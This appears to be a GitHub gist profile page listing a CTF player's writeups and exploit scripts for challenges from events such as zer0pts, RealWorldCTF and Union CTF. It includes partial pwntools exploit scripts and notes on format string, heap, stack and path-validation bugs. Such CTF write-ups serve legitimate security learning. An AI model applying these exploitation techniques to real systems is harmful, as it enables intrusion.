Skip to content

Instantly share code, notes, and snippets.

View farazsth98's full-sized avatar
🔍
Looking for zero days

Faith farazsth98

🔍
Looking for zero days
View GitHub Profile
@farazsth98
farazsth98 / 1-writeup.md
Last active January 30, 2024 21:17
SafeBridge Writeup: See 1-writeup.md for short description of the bug and attack path.

TL;DR

All challenge files + exploit can be found here: https://github.com/farazsth98/CTF/tree/master/realworldctf-2024/safebridge

The setup of the challenge is as follows:

  1. Two bridge contracts deployed on L1 and L2.
  2. WETH is deployed on L2 at hardcoded address L2_WETH.
  3. The deployer has already transferred 2 WETH from L1 to L2, so the L1 bridge has 2 WETH in it.
  4. The objective is to drain the L1 bridge.
@farazsth98
farazsth98 / b64lib.md
Last active April 25, 2021 04:20
S4CTF 2021 - b64lib

The challenge - 2 solves

You can find the challenge files here.

Hackers always love base64.

nc 185.14.184.242 9990

This challenge provided a binary that took some input from the user, and either base64 encoded or base64 decoded it.

@farazsth98
farazsth98 / GuestFS.md
Last active December 11, 2023 19:24
zer0pts CTF 2021 - GuestFS

Vulnerabilities

This was a two part challenge, and I have to cover the vulnerability for the web version as well because its used in the final exploit for RCE.

Files can be found here.

Bug 1: Bypass validate_path() checks

The create() function is as follows:

@farazsth98
farazsth98 / not_beginners_stack.py
Created March 7, 2021 12:04
zer0pts CTF 2021 - Not Beginners Stack
#!/usr/bin/env python3
from pwn import *
#p = process("./chall")
p = remote("pwn.ctf.zer0pts.com", 9011)
#gdb.attach(p)
# Overwrite rbp with return address array + some offset
@farazsth98
farazsth98 / stopwatch.py
Last active March 7, 2021 12:03
zer0pts CTF 2021 - stopwatch
#!/usr/bin/env python3
from pwn import *
elf = ELF("./chall")
libc = ELF("./libc.so.6")
#p = process("./chall", env = {"LD_PRELOAD": "./libc.so.6"})
p = remote("pwn.ctf.zer0pts.com", 9002)
format_str = 0x602100
@farazsth98
farazsth98 / custom.md
Last active February 28, 2021 10:29
AeroCTF 2021 - Custom

Just another object creation primitive. Please, obtain the flag.

custom.tar.gz

nc 151.236.114.211 17102

Hint: FROM mcr.microsoft.com/dotnet/runtime:5.0

Author: keltecc (Discord)

@farazsth98
farazsth98 / notepad.md
Last active February 22, 2021 09:44
Union CTF 2021 - notepad

Here's a cool notepad! We heard that Bjarne Stroustrup himself uses it to manage his notes. Does that make it... notepad++?

nc 35.205.119.236 1337

Author: mrtumble & nankeen

Solves: 10

Functionality

@farazsth98
farazsth98 / harekaze_mini_ctf_2020.md
Last active February 27, 2021 05:24
Harekaze mini CTF 2020

I played Harekaze Mini CTF 2020 for about 3 hours this weekend. The pwn challenges were nice (I especially enjoyed nm-game-extreme). Here are some short writeups.

shellcode

The program just tells you to provide shellcode that will execute execve("/bin/sh", NULL, NULL). It gives you the address of the "/bin/sh" string, so you just create shellcode to do the job and send it:

#!/usr/bin/env python3

from pwn import *
#!/usr/bin/env python3
from pwn import *
context.arch = "amd64"
'''
Bug 1 - printf(hanger[msg]) in the display() function is a format
string bug. My exploit doesn't use it though.

I spent around 3 hrs solving this. I wish I had more time to spend on this CTF because the challenges looked really good!

Challenge

Basically just a Java Heap pwn challenge. You can create and edit chunks, but its done through a JNI function written in C, which means memory corruption is a possibility.